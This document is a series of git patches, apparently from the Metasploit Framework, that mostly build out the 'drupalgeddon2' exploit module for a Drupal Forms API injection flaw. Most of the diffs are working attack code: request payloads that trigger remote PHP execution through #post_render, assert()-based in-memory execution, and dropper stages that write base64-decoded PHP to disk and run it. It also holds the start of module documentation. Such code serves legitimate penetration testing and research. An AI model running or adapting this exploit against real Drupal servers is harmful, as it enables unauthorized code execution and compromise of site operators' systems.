a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index 871916a9e1..b44afe545a 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -19,7 +19,10 @@ class DataStore < Hash @imported_by = Hash.new end + attr_accessor :options attr_accessor :aliases + attr_accessor :imported + attr_accessor :imported_by # # Clears the imported flag for the supplied key since it's being set @@ -216,6 +219,22 @@ class DataStore < Hash end end + def merge!(other) + @options.merge!(other.options) + @aliases.merge!(other.aliases) + @imported.merge!(other.imported) + @imported_by.merge!(other.imported_by) + end + + def merge(other) + ds = clone + ds.options.merge!(other.options) + ds.aliases.merge!(other.aliases) + ds.imported.merge!(other.imported) + ds.imported_by.merge!(other.imported_by) + ds + end + # # Returns a hash of user-defined datastore values. The returned hash does # not include default option values. @@ -345,7 +364,7 @@ class ModuleDataStore < DataStore self.keys.each do |k| clone.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k]) end - clone.aliases = self.aliases + clone.aliases = @aliases clone end end From 00d0beb188f533ee10ce6062542fadb58469a5b4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Wed, 18 Apr 2018 02:34:48 -1000 Subject: [PATCH 25/65] use deep copy --- lib/msf/core/data_store.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/lib/msf/core/data_store.rb b/lib/msf/core/data_store.rb index b44afe545a..3cf6753dd9 100644 --- a/lib/msf/core/data_store.rb +++ b/lib/msf/core/data_store.rb @@ -227,7 +227,7 @@ class DataStore < Hash end def merge(other) - ds = clone + ds = copy ds.options.merge!(other.options) ds.aliases.merge!(other.aliases) ds.imported.merge!(other.imported) From 3611a1dfe48cb8dbc9c29f5970370f82a8d1f9f7 Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Wed, 18 Apr 2018 10:40:11 -0500 Subject: [PATCH 26/65] Update rex-text version --- Gemfile.lock | 7 ++----- lib/rex/crypto/rc4.rb | 2 ++ 2 files changed, 4 insertions(+), 5 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 9802059891..7e93044072 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -187,7 +187,6 @@ GEM mini_portile2 (~> 2.3.0) octokit (4.8.0) sawyer (~> 0.8.0, >= 0.5.3) - openssl (2.1.0) openssl-ccm (1.2.1) openvas-omp (0.0.4) packetfu (1.1.13) @@ -276,9 +275,7 @@ GEM rex-socket rex-text rex-struct2 (0.1.2) - rex-text (0.2.18) - openssl - ruby-rc4 + rex-text (0.2.20) rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) @@ -365,4 +362,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.16.1 \ No newline at end of file + 1.16.1 diff --git a/lib/rex/crypto/rc4.rb b/lib/rex/crypto/rc4.rb index d2ae189840..b3e3a016be 100644 --- a/lib/rex/crypto/rc4.rb +++ b/lib/rex/crypto/rc4.rb @@ -1,5 +1,7 @@ # -*- coding: binary -*- +require 'rc4' + module Rex module Crypto From 86ffbc753e3a94f45bfb0cf173cdd34ab2d4a8c8 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 18 Apr 2018 01:02:45 -0500 Subject: [PATCH 27/65] Refactor clean URL handling and remove dead code --- .../unix/webapp/drupal_drupalgeddon2.rb | 23 +++++-------------- 1 file changed, 6 insertions(+), 17 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 1a9e533e65..bf32881ebf 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -75,7 +75,6 @@ class MetasploitModule < Msf::Exploit::Remote register_options([ OptString.new('TARGETURI', [true, 'Path to Drupal install', '/']), OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']), - OptBool.new('CLEAN_URLS', [false, 'If clean URLs are enabled', true]), OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false]) ]) end @@ -132,6 +131,7 @@ class MetasploitModule < Msf::Exploit::Remote def exploit_drupal7(func, code) vars_get = { + 'q' => 'user/password', 'name[#post_render][]' => func, 'name[#markup]' => code, 'name[#type]' => 'markup' @@ -142,16 +142,9 @@ class MetasploitModule < Msf::Exploit::Remote '_triggering_element_name' => 'name' } - if datastore['CLEAN_URLS'] - uri = normalize_uri(target_uri.path, '/user/password') - else - uri = target_uri.path - vars_get = {'q' => 'user/password'}.merge(vars_get) - end - res = send_request_cgi( 'method' => 'POST', - 'uri' => uri, + 'uri' => target_uri.path, 'vars_get' => vars_get, 'vars_post' => vars_post ) @@ -182,13 +175,16 @@ class MetasploitModule < Msf::Exploit::Remote send_request_cgi( 'method' => 'POST', - 'uri' => uri, + 'uri' => target_uri.path, 'vars_get' => vars_get, 'vars_post' => vars_post ) end def exploit_drupal8(func, code) + # Clean URLs are enabled by default and "can't" be disabled + uri = normalize_uri(target_uri.path, 'user/register') + vars_get = { 'element_parents' => 'account/mail/#value', 'ajax_form' => 1, @@ -203,13 +199,6 @@ class MetasploitModule < Msf::Exploit::Remote 'mail[#markup]' => code } - if datastore['CLEAN_URLS'] - uri = normalize_uri(target_uri.path, '/user/register') - else - uri = target_uri.path - vars_get = {'q' => 'user/register'}.merge(vars_get) - end - send_request_cgi( 'method' => 'POST', 'uri' => uri, From 3d116d721d8c5c99f60d4df0dcb4f349df5efa24 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 18 Apr 2018 21:40:22 -0500 Subject: [PATCH 28/65] Add version detection and automatic targeting I also refactored error handling. Should be cleaner now. --- .../unix/webapp/drupal_drupalgeddon2.rb | 66 +++++++++++++++---- 1 file changed, 52 insertions(+), 14 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index bf32881ebf..b121459043 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -44,6 +44,14 @@ class MetasploitModule < Msf::Exploit::Remote 'Privileged' => false, # XXX: Using "x" in Gem::Version::new isn't technically appropriate 'Targets' => [ + ['Automatic (Unix In-Memory)', + 'Platform' => 'unix', + 'Arch' => ARCH_CMD + ], + ['Automatic (Linux Dropper)', + 'Platform' => 'linux', + 'Arch' => [ARCH_X86, ARCH_X64] + ], ['Drupal 7.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -65,7 +73,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Version' => Gem::Version.new('8.x') ] ], - 'DefaultTarget' => 2, # Drupal 8.x (Unix In-Memory) + 'DefaultTarget' => 0, # Automatic (Unix In-Memory) 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/generic', 'CMD' => 'id; uname -a' @@ -113,6 +121,15 @@ class MetasploitModule < Msf::Exploit::Remote vprint_status("Executing with #{func}(): #{cmd}") res = case target['Version'].to_s + when '' # Automatic + case detect_version.to_s + when '7.x' + print_good('Drupal 7 detected') + exploit_drupal7(func, cmd) + when '8.x' + print_good('Drupal 8 detected') + exploit_drupal8(func, cmd) + end when '7.x' exploit_drupal7(func, cmd) when '8.x' @@ -120,7 +137,7 @@ class MetasploitModule < Msf::Exploit::Remote end unless res && res.code == 200 - vprint_error("Unexpected final reply: #{res.inspect}") + print_error("Unexpected reply: #{res.inspect}") return end @@ -129,6 +146,35 @@ class MetasploitModule < Msf::Exploit::Remote res end + def detect_version + res = send_request_cgi( + 'method' => 'GET', + 'uri' => target_uri.path + ) + + return res unless res && res.code == 200 + + case res.headers['X-Generator'] + when /Drupal 7/ + return Gem::Version.new('7.x') + when /Drupal 8/ + return Gem::Version.new('8.x') + end + + generator = res.get_html_document.at( + '//meta[@name = "Generator"]/@content' + ) + + return res unless generator + + case generator.value + when /Drupal 7/ + Gem::Version.new('7.x') + when /Drupal 8/ + Gem::Version.new('8.x') + end + end + def exploit_drupal7(func, code) vars_get = { 'q' => 'user/password', @@ -149,28 +195,20 @@ class MetasploitModule < Msf::Exploit::Remote 'vars_post' => vars_post ) - unless res && res.code == 200 - vprint_error("Unexpected intermediate reply: #{res.inspect}") - return - end + return res unless res && res.code == 200 form_build_id = res.get_html_document.at( '//input[@name = "form_build_id"]/@value' ) - if form_build_id - form_build_id = form_build_id.value - else - vprint_error("Unknown form_build_id: #{res.inspect}") - return - end + return res unless form_build_id vars_get = { - 'q' => "file/ajax/name/#value/#{form_build_id}" + 'q' => "file/ajax/name/#value/#{form_build_id.value}" } vars_post = { - 'form_build_id' => form_build_id + 'form_build_id' => form_build_id.value } send_request_cgi( From 7a2cc991ff46bf52794cdfb156449ac6a245b875 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 18 Apr 2018 23:58:31 -0500 Subject: [PATCH 29/65] Refactor once more with feeling Nested conditionals are the devil. Printing should be consistent now. --- .../unix/webapp/drupal_drupalgeddon2.rb | 26 ++++++++++--------- 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index b121459043..f10ffefcc2 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -118,23 +118,25 @@ class MetasploitModule < Msf::Exploit::Remote # TODO: passthru() may be disabled, so try others func = opts[:func] || datastore['PHP_FUNC'] || 'passthru' + version = + if target['Version'] + target['Version'].to_s + else + detect_version.to_s + end + + return if version.empty? + + print_good("Drupal #{version} detected at #{full_uri}") vprint_status("Executing with #{func}(): #{cmd}") - res = case target['Version'].to_s - when '' # Automatic - case detect_version.to_s + res = + case version when '7.x' - print_good('Drupal 7 detected') exploit_drupal7(func, cmd) when '8.x' - print_good('Drupal 8 detected') exploit_drupal8(func, cmd) end - when '7.x' - exploit_drupal7(func, cmd) - when '8.x' - exploit_drupal8(func, cmd) - end unless res && res.code == 200 print_error("Unexpected reply: #{res.inspect}") @@ -152,7 +154,7 @@ class MetasploitModule < Msf::Exploit::Remote 'uri' => target_uri.path ) - return res unless res && res.code == 200 + return unless res && res.code == 200 case res.headers['X-Generator'] when /Drupal 7/ @@ -165,7 +167,7 @@ class MetasploitModule < Msf::Exploit::Remote '//meta[@name = "Generator"]/@content' ) - return res unless generator + return unless generator case generator.value when /Drupal 7/ From 2670d06f99f9b4e12e083ed000008b30176d8640 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 19 Apr 2018 01:49:09 -0500 Subject: [PATCH 30/65] Add in-memory PHP execution using assert() --- .../unix/webapp/drupal_drupalgeddon2.rb | 40 +++++++++++++++---- 1 file changed, 32 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index f10ffefcc2..c94279edcb 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -39,11 +39,19 @@ class MetasploitModule < Msf::Exploit::Remote ], 'DisclosureDate' => 'Mar 28 2018', 'License' => MSF_LICENSE, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], + 'Platform' => ['php', 'unix', 'linux'], + 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, # XXX: Using "x" in Gem::Version::new isn't technically appropriate 'Targets' => [ + # + # Automatic targets (PHP, cmd/unix, native) + # + ['Automatic (PHP In-Memory)', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Payload' => {'Encoder' => 'php/base64'} + ], ['Automatic (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD @@ -52,6 +60,15 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => 'linux', 'Arch' => [ARCH_X86, ARCH_X64] ], + # + # Drupal 7.x targets (PHP, cmd/unix, native) + # + ['Drupal 7.x (PHP In-Memory)', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Payload' => {'Encoder' => 'php/base64'}, + 'Version' => Gem::Version.new('7.x') + ], ['Drupal 7.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -62,6 +79,15 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => [ARCH_X86, ARCH_X64], 'Version' => Gem::Version.new('7.x') ], + # + # Drupal 8.x targets (PHP, cmd/unix, native) + # + ['Drupal 8.x (PHP In-Memory)', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Payload' => {'Encoder' => 'php/base64'}, + 'Version' => Gem::Version.new('8.x') + ], ['Drupal 8.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -73,11 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Version' => Gem::Version.new('8.x') ] ], - 'DefaultTarget' => 0, # Automatic (Unix In-Memory) - 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/unix/generic', - 'CMD' => 'id; uname -a' - } + 'DefaultTarget' => 0 # Automatic (PHP In-Memory) )) register_options([ @@ -107,6 +129,8 @@ class MetasploitModule < Msf::Exploit::Remote end case target.name + when /PHP/ + execute_command(payload.encoded, func: 'assert') when /In-Memory/ execute_command(payload.encoded) when /Dropper/ @@ -138,7 +162,7 @@ class MetasploitModule < Msf::Exploit::Remote exploit_drupal8(func, cmd) end - unless res && res.code == 200 + unless res && res.code == 200 || session_created? print_error("Unexpected reply: #{res.inspect}") return end From 62aca93d8bed7458b2fe40720e4faf64f961a0fd Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 19 Apr 2018 04:59:07 -0500 Subject: [PATCH 31/65] Cache version detection and print only once Oops. This is the problem with overloading methods. --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index c94279edcb..28fb0b92c0 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -142,20 +142,24 @@ class MetasploitModule < Msf::Exploit::Remote # TODO: passthru() may be disabled, so try others func = opts[:func] || datastore['PHP_FUNC'] || 'passthru' - version = + @version ||= if target['Version'] target['Version'].to_s else detect_version.to_s end - return if version.empty? + return if @version.empty? + + unless @version_printed + print_good("Drupal #{@version} detected at #{full_uri}") + @version_printed = true + end - print_good("Drupal #{version} detected at #{full_uri}") vprint_status("Executing with #{func}(): #{cmd}") res = - case version + case @version when '7.x' exploit_drupal7(func, cmd) when '8.x' From fcfe927b7aaadbf0ad0fd6b42bd3f68836726363 Mon Sep 17 00:00:00 2001 From: William Vu Date: Thu, 19 Apr 2018 05:02:06 -0500 Subject: [PATCH 32/65] Add PHP dropper functionality and targets --- .../unix/webapp/drupal_drupalgeddon2.rb | 46 +++++++++++++++++-- 1 file changed, 42 insertions(+), 4 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 28fb0b92c0..44f635d55e 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -9,6 +9,7 @@ class MetasploitModule < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager + include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, @@ -52,6 +53,11 @@ class MetasploitModule < Msf::Exploit::Remote 'Arch' => ARCH_PHP, 'Payload' => {'Encoder' => 'php/base64'} ], + ['Automatic (PHP Dropper)', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Payload' => {'Encoder' => 'php/base64'} + ], ['Automatic (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD @@ -69,6 +75,12 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => {'Encoder' => 'php/base64'}, 'Version' => Gem::Version.new('7.x') ], + ['Drupal 7.x (PHP Dropper)', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Payload' => {'Encoder' => 'php/base64'}, + 'Version' => Gem::Version.new('7.x') + ], ['Drupal 7.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -88,6 +100,12 @@ class MetasploitModule < Msf::Exploit::Remote 'Payload' => {'Encoder' => 'php/base64'}, 'Version' => Gem::Version.new('8.x') ], + ['Drupal 8.x (PHP Dropper)', + 'Platform' => 'php', + 'Arch' => ARCH_PHP, + 'Payload' => {'Encoder' => 'php/base64'}, + 'Version' => Gem::Version.new('8.x') + ], ['Drupal 8.x (Unix In-Memory)', 'Platform' => 'unix', 'Arch' => ARCH_CMD, @@ -110,7 +128,7 @@ class MetasploitModule < Msf::Exploit::Remote end def check - token = Rex::Text.rand_text_alphanumeric(8..42) + token = random_crap res = execute_command(token, func: 'printf') @@ -129,11 +147,27 @@ class MetasploitModule < Msf::Exploit::Remote end case target.name - when /PHP/ + when /PHP In-Memory/ execute_command(payload.encoded, func: 'assert') - when /In-Memory/ + when /PHP Dropper/ + tmpfile = random_crap + encoded = Rex::Text.encode_base64("") + + stage1 = %Q{ + file_put_contents("#{tmpfile}", base64_decode("#{encoded}")); + } + + stage2 = %Q{ + include_once("#{tmpfile}"); + } + + register_file_for_cleanup(tmpfile) + + execute_command(stage1.strip, func: 'assert') + execute_command(stage2.strip, func: 'assert') + when /Unix In-Memory/ execute_command(payload.encoded) - when /Dropper/ + when /Linux Dropper/ execute_cmdstager end end @@ -275,4 +309,8 @@ class MetasploitModule < Msf::Exploit::Remote ) end + def random_crap + Rex::Text.rand_text_alphanumeric(8..42) + end + end From 69995b7f806e835669f98f68b3584e64d102c50f Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Thu, 19 Apr 2018 10:41:23 -0500 Subject: [PATCH 33/65] Change --encryptor to --encrypt and fix a typo --- modules/payloads/singles/windows/exec.rb | 2 +- msfvenom | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/singles/windows/exec.rb b/modules/payloads/singles/windows/exec.rb index 783319bbef..753f0fff56 100644 --- a/modules/payloads/singles/windows/exec.rb +++ b/modules/payloads/singles/windows/exec.rb @@ -8,7 +8,7 @@ require 'msf/core/payload/windows/exec' ### # # Executes a command on the target machine -#w +# ### module MetasploitModule diff --git a/msfvenom b/msfvenom index 407233b294..3cf9eeecab 100755 --- a/msfvenom +++ b/msfvenom @@ -106,7 +106,7 @@ def parse_args(args) raise HelpError, msg end - opt.on('--encryptor ', String, 'The type of encryptor or encoder to use for the shellcode') do |e| + opt.on('--encrypt ', String, 'The type of encryption or encoding to apply to the shellcode') do |e| opts[:encryption_format] = e end From 8be58d315c4c94be810c1d08a5c1ba29b686756a Mon Sep 17 00:00:00 2001 From: William Vu Date: Fri, 20 Apr 2018 19:12:51 -0500 Subject: [PATCH 34/65] Stop being lazy about badchar analysis Badchars apply to all targets. --- modules/exploits/unix/webapp/drupal_drupalgeddon2.rb | 11 +++-------- 1 file changed, 3 insertions(+), 8 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 44f635d55e..044c062653 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -43,6 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['php', 'unix', 'linux'], 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, + 'Payload' => {'BadChars' => '&'}, # XXX: Using "x" in Gem::Version::new isn't technically appropriate 'Targets' => [ # @@ -50,13 +51,11 @@ class MetasploitModule < Msf::Exploit::Remote # ['Automatic (PHP In-Memory)', 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Payload' => {'Encoder' => 'php/base64'} + 'Arch' => ARCH_PHP ], ['Automatic (PHP Dropper)', 'Platform' => 'php', - 'Arch' => ARCH_PHP, - 'Payload' => {'Encoder' => 'php/base64'} + 'Arch' => ARCH_PHP ], ['Automatic (Unix In-Memory)', 'Platform' => 'unix', @@ -72,13 +71,11 @@ class MetasploitModule < Msf::Exploit::Remote ['Drupal 7.x (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Payload' => {'Encoder' => 'php/base64'}, 'Version' => Gem::Version.new('7.x') ], ['Drupal 7.x (PHP Dropper)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Payload' => {'Encoder' => 'php/base64'}, 'Version' => Gem::Version.new('7.x') ], ['Drupal 7.x (Unix In-Memory)', @@ -97,13 +94,11 @@ class MetasploitModule < Msf::Exploit::Remote ['Drupal 8.x (PHP In-Memory)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Payload' => {'Encoder' => 'php/base64'}, 'Version' => Gem::Version.new('8.x') ], ['Drupal 8.x (PHP Dropper)', 'Platform' => 'php', 'Arch' => ARCH_PHP, - 'Payload' => {'Encoder' => 'php/base64'}, 'Version' => Gem::Version.new('8.x') ], ['Drupal 8.x (Unix In-Memory)', From c8b6482ab012a32e462d9f129a4f0f4d852d2a63 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 00:02:15 -0500 Subject: [PATCH 35/65] Rewrite PHP targets to work with 7.x and 8.x Win some, lose some. php -r spawns a new (obvious) command. :/ Check method and version detection also rewritten. :) --- .../unix/webapp/drupal_drupalgeddon2.rb | 197 ++++++++++++------ 1 file changed, 139 insertions(+), 58 deletions(-) diff --git a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb index 044c062653..f842f3da5a 100644 --- a/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb +++ b/modules/exploits/unix/webapp/drupal_drupalgeddon2.rb @@ -8,7 +8,8 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager + # XXX: CmdStager can't handle badchars + include Msf::Exploit::PhpEXE include Msf::Exploit::FileDropper def initialize(info = {}) @@ -43,7 +44,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Platform' => ['php', 'unix', 'linux'], 'Arch' => [ARCH_PHP, ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => false, - 'Payload' => {'BadChars' => '&'}, + 'Payload' => {'BadChars' => '&>\''}, # XXX: Using "x" in Gem::Version::new isn't technically appropriate 'Targets' => [ # @@ -120,21 +121,39 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('PHP_FUNC', [true, 'PHP function to execute', 'passthru']), OptBool.new('DUMP_OUTPUT', [false, 'If output should be dumped', false]) ]) + + register_advanced_options([ + OptBool.new('ForceExploit', [false, 'Override check result', false]), + OptString.new('WritableDir', [false, 'Writable dir for dropped binaries']) + ]) end def check - token = random_crap + checkcode = CheckCode::Safe - res = execute_command(token, func: 'printf') - - if res && res.body.include?(token) - return CheckCode::Vulnerable + if drupal_version + print_status("Drupal #{@version} targeted at #{full_uri}") + checkcode = CheckCode::Detected + else + print_error('Could not configure Drupal version') + return CheckCode::Unknown end - CheckCode::Safe + token = random_crap + res = execute_command(token, func: 'printf') + + if res && res.body.start_with?(token) + checkcode = CheckCode::Vulnerable + end + + checkcode end def exploit + unless check == CheckCode::Vulnerable || datastore['ForceExploit'] + fail_with(Failure::NotVulnerable, 'Set ForceExploit to override') + end + if datastore['PAYLOAD'] == 'cmd/unix/generic' print_warning('Enabling DUMP_OUTPUT for cmd/unix/generic') # XXX: Naughty datastore modification @@ -143,69 +162,129 @@ class MetasploitModule < Msf::Exploit::Remote case target.name when /PHP In-Memory/ - execute_command(payload.encoded, func: 'assert') - when /PHP Dropper/ - tmpfile = random_crap - encoded = Rex::Text.encode_base64("") - - stage1 = %Q{ - file_put_contents("#{tmpfile}", base64_decode("#{encoded}")); - } - - stage2 = %Q{ - include_once("#{tmpfile}"); - } - - register_file_for_cleanup(tmpfile) - - execute_command(stage1.strip, func: 'assert') - execute_command(stage2.strip, func: 'assert') + case @version.to_s + when '7.x' + # In-process execution when assert() is enabled + execute_command(payload.encoded, func: 'assert') + when '8.x' + # XXX: This will spawn a *very* obvious process + execute_command("php -r '#{payload.encoded}'") + end when /Unix In-Memory/ execute_command(payload.encoded) - when /Linux Dropper/ - execute_cmdstager + when /PHP Dropper/, /Linux Dropper/ + case @version.to_s + when '7.x' + execute_dropper7 + when '8.x' + execute_dropper8 + end end end + # XXX: Ivars are being preserved + def cleanup + begin + remove_instance_variable(:@version) + rescue NameError + end + + super + end + + def execute_dropper7 + php_file = "#{random_crap}.php" + + # Return the PHP payload or a PHP binary dropper + dropper = get_write_exec_payload( + writable_path: datastore['WritableDir'], + unlink_self: true # Worth a shot + ) + + # Encode away potential badchars with Base64 + dropper = Rex::Text.encode_base64(dropper) + + # Stage 1 decodes the PHP and writes it to disk + stage1 = %Q{ + file_put_contents("#{php_file}", base64_decode("#{dropper}")); + } + + # Stage 2 executes said PHP in-process + stage2 = %Q{ + include_once("#{php_file}"); + } + + # :unlink_self may not work, so let's make sure + register_file_for_cleanup(php_file) + + # Hopefully pop our shell with assert() + execute_command(stage1.strip, func: 'assert') + execute_command(stage2.strip, func: 'assert') + end + + def execute_dropper8 + php_file = "#{random_crap}.php" + + # Return the PHP payload or a PHP binary dropper + dropper = get_write_exec_payload( + writable_path: datastore['WritableDir'], + unlink_self: true # Worth a shot + ) + + # Encode away potential badchars with Base64 + dropper = Rex::Text.encode_base64(dropper) + + # :unlink_self may not work, so let's make sure + register_file_for_cleanup(php_file) + + # Write the payload or dropper to disk (!) + # NOTE: Analysis indicates > is a badchar for 8.x + execute_command("echo #{dropper} | base64 -d | tee #{php_file}") + + # Attempt in-process execution of our PHP script + send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, php_file) + ) + + return if session_created? + + # Last-ditch effort to get a shell with PHP CLI + execute_command("php #{php_file}") + end + def execute_command(cmd, opts = {}) # TODO: passthru() may be disabled, so try others func = opts[:func] || datastore['PHP_FUNC'] || 'passthru' - @version ||= - if target['Version'] - target['Version'].to_s - else - detect_version.to_s - end - - return if @version.empty? - - unless @version_printed - print_good("Drupal #{@version} detected at #{full_uri}") - @version_printed = true - end - - vprint_status("Executing with #{func}(): #{cmd}") + print_status("Executing with #{func}(): #{cmd}") res = - case @version + case @version.to_s when '7.x' exploit_drupal7(func, cmd) when '8.x' exploit_drupal8(func, cmd) end - unless res && res.code == 200 || session_created? + if res && res.code != 200 print_error("Unexpected reply: #{res.inspect}") return end - print_line(res.body) if datastore['DUMP_OUTPUT'] + if res && datastore['DUMP_OUTPUT'] + print_line(res.body) + end res end - def detect_version + def drupal_version + if target['Version'] + @version = target['Version'] + return @version + end + res = send_request_cgi( 'method' => 'GET', 'uri' => target_uri.path @@ -213,12 +292,13 @@ class MetasploitModule < Msf::Exploit::Remote return unless res && res.code == 200 - case res.headers['X-Generator'] - when /Drupal 7/ - return Gem::Version.new('7.x') - when /Drupal 8/ - return Gem::Version.new('8.x') - end + @version = + case res.headers['X-Generator'] + when /Drupal 7/ + Gem::Version.new('7.x') + when /Drupal 8/ + Gem::Version.new('8.x') + end generator = res.get_html_document.at( '//meta[@name = "Generator"]/@content' @@ -226,12 +306,13 @@ class MetasploitModule < Msf::Exploit::Remote return unless generator - case generator.value - when /Drupal 7/ - Gem::Version.new('7.x') - when /Drupal 8/ - Gem::Version.new('8.x') - end + @version = + case generator.value + when /Drupal 7/ + Gem::Version.new('7.x') + when /Drupal 8/ + Gem::Version.new('8.x') + end end def exploit_drupal7(func, code) From 2abfee83de498d3cccb76dff69f5b247751154e8 Mon Sep 17 00:00:00 2001 From: William Vu Date: Tue, 24 Apr 2018 04:03:35 -0500 Subject: [PATCH 36/65] Add module doc to appease the @h00die god --- .../unix/webapp/drupal_drupalgeddon2.md | 81 +++++++++++++++++++ 1 file changed, 81 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md diff --git a/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md new file mode 100644 index 0000000000..a4a345bc75 --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/drupal_drupalgeddon2.md @@ -0,0 +1,81 @@ +## Intro + +> This module exploits a Drupal property injection in the Forms API. +> Drupal 6.x, < 7.58, 8.2.x, < 8.3.9, < 8.4.6, and < 8.5.1 are +> vulnerable. + +## Setup + +Use the provided Docker images here: . + +Tested on the 7.57 and 8.4.5 tags (versions). + +## Targets + +``` +Id Name +-- ---- +0 Automatic (PHP In-Memory) +1 Automatic (PHP Dropper) +2 Automatic (Unix In-Memory) +3 Automatic (Linux Dropper) +4 Drupal 7.x (PHP In-Memory) +5 Drupal 7.x (PHP Dropper) +6 Drupal 7.x (Unix In-Memory) +7 Drupal 7.x (Linux Dropper) +8 Drupal 8.x (PHP In-Memory) +9 Drupal 8.x (PHP Dropper) +10 Drupal 8.x (Unix In-Memory) +11 Drupal 8.x (Linux Dropper) +``` + +## Options + +**PHP_FUNC** + +Set this to the PHP function you'd like to execute. Defaults to +`passthru`. + +**DUMP_OUTPUT** + +Enable this if you'd like to see HTTP responses, including command +output. Defaults to `false` unless `cmd/unix/generic` is 